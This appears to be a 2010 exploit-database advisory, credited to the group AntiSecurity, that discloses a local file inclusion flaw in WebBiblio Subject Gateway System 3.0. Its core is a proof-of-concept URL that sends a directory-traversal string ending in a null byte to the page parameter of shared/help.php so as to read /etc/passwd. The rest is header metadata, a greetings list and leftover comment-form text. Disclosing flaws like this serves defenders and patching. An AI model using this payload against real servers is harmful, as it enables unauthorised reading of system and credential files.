WebBiblio Subject Gateway System 3.0 local file inclusion

2010.06.10

Credit: AntiSecurity

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

=========================================================================================================

  [o] WebBiblio Subject Gateway System Local File Inclusion Vulnerability

       Software : WebBiblio version 3.0
       Vendor   : http://webbiblio.sourceforge.net/
       Download : http://sourceforge.net/projects/webbiblio/files/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/

=========================================================================================================

  [o] Exploit

       http://localhost/[path]/shared/help.php?page=[LFI]

  [o] PoC

       http://localhost/shared/help.php?page=../../../../../../../../../../../../../../../etc/passwd%00

=========================================================================================================

  [o] Greetz

       Angela Zhang stardustmemory aJe wishnusakti inc0mp13te pizzyroot
       kaka11 matthews xrootboy martfella Genex H312Y }^-^{ k1tk4t str0ke
       ArRay bjork xmazinha veter f1 akatsuchi N4ck0
       all people in #evilc0de [at] irc.byroe.net

=========================================================================================================

  [o] June 06 2010 - GMT +07:00 Jakarta, Indonesia

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WebBiblio Subject Gateway System 3.0 local file inclusion

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.